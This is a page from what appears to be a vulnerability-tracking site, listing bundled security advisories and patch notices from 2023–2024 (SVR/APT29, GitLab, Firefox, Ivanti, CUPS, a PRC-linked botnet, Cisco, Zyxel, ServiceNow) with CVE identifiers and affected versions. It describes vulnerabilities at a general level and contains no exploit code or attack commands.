Recent bundles

JSON

The Federal Bureau of Investigation (FBI), the National Security Agency (NSA), Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to highlight the tactics, techniques, and procedures (TTPs) employed by the Russian Federation’s Foreign Intelligence Service (SVR) in recent cyber operations and provide network defenders with information to help counter SVR cyber threats. Since at least 2021, Russian SVR cyber actors – also tracked as APT29, Midnight Blizzard (formerly Nobelium), Cozy Bear, and the Dukes– have consistently targeted US, European, and global entities in the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations, including in support of Russia’s ongoing invasion of Ukraine since February 2022. Their operations continue to pose a global threat to government and private sector organization

The authoring agencies are releasing this CSA to warn network defenders that SVR cyber actors are highly capable of and interested in exploiting software vulnerabilities for initial access [T1190] and escalation of privileges [T1068]. Organizations should prioritize rapid patch deployment and keep software up to date. The SVR continues using TTPs such as spearphishing [T1566], password spraying [T1078], abuse of supply chain [T1195] and trusted relationships [T1199], custom and bespoke malware, cloud exploitation, and living-off-the-land techniques to gain initial access, escalate privileges, move laterally, maintain persistence in victim networks and cloud environments, and exfiltrate information. SVR actors often use The Onion Router (TOR) network, leased and compromised infrastructure, and proxies to obfuscate activity.

Ref: PDF - Update on SVR Cyber Operations and Vulnerability Exploitation

Related vulnerabilities: CVE-2023-40289CVE-2023-42793CVE-2023-24023CVE-2023-45866CVE-2022-40507CVE-2021-27850CVE-2023-37580CVE-2023-20198CVE-2023-38546CVE-2023-40076CVE-2023-35078CVE-2021-41773CVE-2023-29357CVE-2023-5044CVE-2023-4911CVE-2023-6345CVE-2023-40088CVE-2018-13379CVE-2023-4966CVE-2023-36745CVE-2023-38545CVE-2023-24955CVE-2021-42013CVE-2023-40077

JSON

GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9 Nikhil George 8–10 minutes

Learn more about GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9 for GitLab Community Edition (CE) and Enterprise Edition (EE).

Today we are releasing versions 17.4.2, 17.3.5, 17.2.9 for GitLab Community Edition (CE) and Enterprise Edition (EE).

These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. GitLab.com is already running the patched version. GitLab Dedicated customers do not need to take action.

GitLab releases fixes for vulnerabilities in patch releases. There are two types of patch releases: scheduled releases, and ad-hoc critical patches for high-severity vulnerabilities. Scheduled releases are released twice a month on the second and fourth Wednesdays. For more information, you can visit our releases handbook and security FAQ. You can see all of GitLab release blog posts here.

For security fixes, the issues detailing each vulnerability are made public on our issue tracker 30 days after the release in which they were patched.

We are committed to ensuring all aspects of GitLab that are exposed to customers or that host customer data are held to the highest security standards. As part of maintaining good security hygiene, it is highly recommended that all customers upgrade to the latest patch release for their supported version. You can read more best practices in securing your GitLab instance in our blog post. Recommended Action

We strongly recommend that all installations running a version affected by the issues described below are upgraded to the latest version as soon as possible.

When no specific deployment type (omnibus, source code, helm chart, etc.) of a product is mentioned, this means all types are affected. Security fixes Table of security fixes Title Severity Run pipelines on arbitrary branches Critical An attacker can impersonate arbitrary user High SSRF in Analytics Dashboard High Viewing diffs of MR with conflicts can be slow High HTMLi in OAuth page High Deploy Keys can push changes to an archived repository Medium Guests can disclose project templates Medium GitLab instance version disclosed to unauthorized users Low Run pipelines on arbitrary branches

An issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). It is now mitigated in the latest release and is assigned CVE-2024-9164.

Thanks pwnie for reporting this vulnerability through our HackerOne bug bounty program. An attacker can impersonate arbitrary user

An issue was discovered in GitLab CE/EE affecting all versions starting from 11.6 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows an attacker to trigger a pipeline as another user under certain circumstances. This is a high severity issue (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N, 8.2). It is now mitigated in the latest release and is assigned CVE-2024-8970.

Thanks yvvdwf for reporting this vulnerability through our HackerOne bug bounty program. SSRF in Analytics Dashboard

An issue has been discovered in GitLab EE affecting all versions starting from 15.10 prior to 17.2.9, from 17.3 prior to 17.3.5, and from 17.4 prior to 17.4.2. Instances with Product Analytics Dashboard configured and enabled could be vulnerable to SSRF attacks. This is a high severity issue (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N, 8.2). It is now mitigated in the latest release and is assigned CVE-2024-8977.

Thanks joaxcar for reporting this vulnerability through our HackerOne bug bounty program. Viewing diffs of MR with conflicts can be slow

An issue was discovered in GitLab CE/EE affecting all versions starting from 13.6 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, were viewing diffs of MR with conflicts can be slow. This is a high severity issue (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, 7.5). It is now mitigated in the latest release and is assigned CVE-2024-9631.

Thanks a92847865 for reporting this vulnerability through our HackerOne bug bounty program. HTMLi in OAuth page

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 17.1 prior 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2. When authorising a new application, it can be made to render as HTML under specific circumstances. This is a high severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N, 7.3). It is now mitigated in the latest release and is assigned CVE-2024-6530.

Thanks joaxcar for reporting this vulnerability through our HackerOne bug bounty program. Deploy Keys can push changes to an archived repository

An issue was discovered in GitLab CE/EE affecting all versions starting from 8.16 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows deploy keys to push to an archived repository. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N, 4.9). It is now mitigated in the latest release and is assigned CVE-2024-9623.

Thanks stevenorman for reporting this vulnerability. Guests can disclose project templates

An issue has been discovered discovered in GitLab EE/CE affecting all versions starting from 11.4 before 17.2.9, all versions starting from 17.3 before 17.3.5, all versions starting from 17.4 before 17.4.2 It was possible for guest users to disclose project templates using the API. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, 4.3). It is now mitigated in the latest release and is assigned CVE-2024-5005.

Thanks js_noob for reporting this vulnerability through our HackerOne bug bounty program. GitLab instance version disclosed to unauthorized users

An issue has been discovered in GitLab EE affecting all versions starting from 16.6 prior to 17.2.9, from 17.3 prior to 17.3.5, and from 17.4 prior to 17.4.2. It was possible for an unauthenticated attacker to determine the GitLab version number for a GitLab instance. This is a low severity issue (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N, 3.7). It is now mitigated in the latest release and is assigned CVE-2024-9596.

This issue was discovered internally by GitLab team member Paul Gascou-Vaillancourt. Bug fixes 17.4.2

Backport: fix: Specify an absolute directory for SCHEMA_VERSIONS_DIR to 17-4-stable
Backport grpc-go v1.67.1 upgrade to 17.4
Update expected vulnerability in enable_advanced_sast_spec.rb
Skip multi-version upgrade job for stable branch MRs
Backport 17.4 Fix label filter by name for search
Restrict duo pro assignment email to duo pro for sm
Drop project_id not null constraint ci_deleted_objects
[Backport] Go-get: fix 401 error for unauthenticated requests

17.3.5

Backport: fix: Specify an absolute directory for SCHEMA_VERSIONS_DIR to 17-3-stable
Backport: fix: Allow non-root user to run the bundle-certificates script 17.3
Skip multi-version upgrade job for stable branch MRs
Ensure restricted visibility levels is an array - 17.3 backport

17.2.9

Skip multi-version upgrade job for stable branch MRs
Ensure restricted visibility levels is an array - 17.2 backport

Updating

To update GitLab, see the Update page. To update Gitlab Runner, see the Updating the Runner page. Receive Patch Notifications

To receive patch blog notifications delivered to your inbox, visit our contact us page. To receive release notifications via RSS, subscribe to our patch release RSS feed or our RSS feed for all releases. We’re combining patch and security releases

This improvement in our release process matches the industry standard and will help GitLab users get information about security and bug fixes sooner, read the blog post here.

Related vulnerabilities: CVE-2024-5005CVE-2024-9596CVE-2024-8977CVE-2024-9631CVE-2024-6530CVE-2024-9623CVE-2024-8970CVE-2024-9164

JSON

The vulnerability, tracked as CVE-2024-9680, and discovered by ESET researcher Damien Schaeffer, is a use-after-free in Animation timelines.

"An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild."

A patch has been made available on Tue, 08 Oct 2024 16:25:12 +0000.

Related vulnerabilities: CVE-2024-9680

JSON

Ivanti original security advisory

¨"At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers"". Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers.

In recent months, we have intensified our internal scanning, manual exploitation and testing capabilities, and have additionally made improvements to our responsible disclosure process so that we can promptly discover and address potential issues.

Ivanti is making a large investment in Secure by Design across our organization and signed the CISA Secure by Design pledge in May. You can follow along with our progress here.

Today, fixes have been released for the following Ivanti solutions: Ivanti Endpoint Manager Mobile (EPMM), Ivanti Cloud Service Application (CSA), Ivanti Velocity License Server, Ivanti Connect Secure and Policy Secure, and Ivanti Avalanche.

It is important for customers to know:

We are aware of a limited number of customers running CSA 4.6 patch 518 and prior who have been exploited when CVE-2024-9379 or CVE-2024-9380 are chained with CVE-2024-8963. We have not observed these vulnerabilities being exploited in any version of CSA 5.0.
We have no evidence of any other vulnerabilities being exploited in the wild.
These vulnerabilities do not impact any other Ivanti products or solutions.

More information on these vulnerabilities and detailed instructions on how to remediate the issues can be found in these Security Advisories:

  • Ivanti EPMM
  • Ivanti CSA
  • Ivanti Velocity License Server
  • Ivanti Avalanche
  • Ivanti Connect Secure/Policy Secure

Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required).

Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

Original source: https://www.ivanti.com/blog/october-2024-security-update

Counter analysis from @screaminggoat@infosec.exchange

~~~ Ivanti Security Advisory: Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381) Very sneaky of Ivanti to quietly update the security advisory without a changelog: They removed CVE-2024-9381 (CVSSv3: 7.2 high) Path traversal in Ivanti CSA before version 5.0.2 from the exploitation announcement: ~~~

Original source: https://social.circl.lu/@screaminggoat@infosec.exchange/113278926244627512

Related vulnerabilities: CVE-2024-9379CVE-2024-9380CVE-2024-8963CVE-2024-9381

JSON

Following the initial research available at the Attacking UNIX Systems via CUPS, Part I done by evilsocket.net.

OpenPrinting Vendor Fixes

The already available fixes are sufficient to prevent the exploit.

Additional vulnerabilities

  • CVE-2024-47850 - CUPS cups-browsed before 2.5b1 will send an HTTP POST request to an arbitrary destination and port in response to a single IPP UDP packet requesting a printer to be added, a different vulnerability than CVE-2024-47176. (The request is meant to probe the new printer but can be used to create DDoS amplification attacks.)

Additional reference

Related vulnerabilities: CVE-2024-47076CVE-2024-47850GHSA-RJ88-6MR5-RCW8GHSA-7XFX-47QG-GRP6CVE-2024-47175GHSA-P9RH-JXMQ-GQ47CVE-2024-47177GHSA-W63J-6G73-WMG5CVE-2024-47176

JSON

TL;DR: All versions of Red Hat Enterprise Linux (RHEL) are affected by CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, but are not vulnerable in their default configurations.

Red Hat has been made aware of a group of vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177) within OpenPrinting CUPS, an open source printing system that is prevalent in most modern Linux distributions, including RHEL. Specifically, CUPS provides tools to manage, discover and share printers for Linux distributions. By chaining this group of vulnerabilities together, an attacker could potentially achieve remote code execution which could then lead to theft of sensitive data and/or damage to critical production systems.

Red Hat rates these issues with a severity impact of Important. While all versions of RHEL are affected, it is important to note that affected packages are not vulnerable in their default configuration. At this time, there are four CVEs assigned to these vulnerabilities, but the exact number is still being coordinated with the upstream community and the researcher who discovered the problem.

More details

Related vulnerabilities: CVE-2024-47076CVE-2024-47176CVE-2024-47177CVE-2024-47175

JSON

The Federal Bureau of Investigation (FBI), Cyber National Mission Force (CNMF), and National Security Agency (NSA) assess that People’s Republic of China (PRC)-linked cyber actors have compromised thousands of Internet-connected devices, including small office/home office (SOHO) routers, firewalls, network-attached storage (NAS) and Internet of Things (IoT) devices with the goal of creating a network of compromised nodes (a “botnet”) positioned for malicious activity. The actors may then use the botnet as a proxy to conceal their identities while deploying distributed denial of service (DDoS) attacks or compromising targeted U.S. networks. Integrity Technology Group, a PRC-based company, has controlled and managed a botnet active since mid- 2021. The botnet has regularly maintained between tens to hundreds of thousands of compromised devices. As of June 2024, the botnet consisted of over 260,000 devices. Victim devices part of the botnet have been observed in North America, South America, Europe, Africa, Southeast Asia and Australia. While devices aged beyond their end-of-life dates are known to be more vulnerable to intrusion, many of the compromised devices in the Integrity Tech controlled botnet are likely still supported by their respective vendors. FBI, CNMF, NSA, and allied partners are releasing this Joint Cyber Security Advisory to highlight the threat posed by these actors and their botnet activity and to encourage exposed device vendors, owners, and operators to update and secure their devices from being compromised and joining the botnet. Network defenders are advised to follow the guidance in the mitigations section to protect against the PRC-linked cyber actors’ botnet activity. Cyber security companies can also leverage the information in this advisory to assist with identifying malicious activity and reducing the number of devices present in botnets worldwide. For additional information, see U.S. Department of Justice (DOJ) press release.

https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF

Related vulnerabilities: CVE-2024-5217CVE-2024-4577CVE-2023-47218CVE-2024-29269CVE-2023-50386CVE-2024-29973CVE-2024-21762

JSON

Two critical vulnerabilities in Cisco's Smart Licensing Utility allow remote, unauthenticated attackers to gain privileges or access sensitive data.

Vulnerabilities:

  • CVE-2024-20439 (CVSS: 9.8): An undocumented static admin account can be exploited to access affected systems.
  • CVE-2024-20440 (CVSS: 7.5): An overly verbose debug log can be exploited via a crafted HTTP request, exposing API credentials.

⚠️ These issues are only exploitable if the licensing utility is actively running. Cisco strongly advises updating systems to mitigate these threats.

Related vulnerabilities: CVE-2024-20440CVE-2024-20439

JSON

Zyxel has released patches addressing multiple vulnerabilities in some firewall versions. Users are advised to install the patches for optimal protection.

Firewall series CVE-2024-6343 CVE-2024-7203 CVE-2024-42057 CVE-2024-42058 CVE-2024-42059 CVE-2024-42060 CVE-2024-42061 Patch availability
ATP ZLD V4.32 to V5.38 ZLD V4.60 to V5.38 ZLD V4.32 to V5.38 ZLD V4.32 to V5.38 ZLD V5.00 to V5.38 ZLD V4.32 to V5.38 ZLD V4.32 to V5.38 ZLD V5.39
USG FLEX ZLD V4.50 to V5.38 ZLD V4.60 to V5.38 ZLD V4.50 to V5.38 ZLD V4.50 to V5.38 ZLD V5.00 to V5.38 ZLD V4.50 to V5.38 ZLD V4.50 to V5.38 ZLD V5.39
USG FLEX 50(W)/USG20(W)-VPN ZLD V4.16 to V5.38 Not affected ZLD V4.16 to V5.38 ZLD V4.20 to V5.38 ZLD V5.00 to V5.38 ZLD V4.16 to V5.38 ZLD V4.16 to V5.38 ZLD V5.39

Related vulnerabilities: CVE-2024-6343CVE-2024-7203CVE-2024-42057CVE-2024-42058CVE-2024-42059CVE-2024-42060CVE-2024-42061

JSON

  • KB1648313 CVE-2024-5217 - Incomplete Input Validation in GlideExpression Script 2024-07-10
  • KB1648312 CVE-2024-5178 - Incomplete Input Validation in SecurelyAccess API 2024-07-10
  • KB1645154 CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow UI Macros 2024-07-10

CVE-2024-4879 sounds to be the most serious vulnerability allowing RCE for non-authenticated users.

ref: https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1226057

Related vulnerabilities: CVE-2024-5217CVE-2024-5178CVE-2024-4879

displaying 101 - 110 bundles in total 112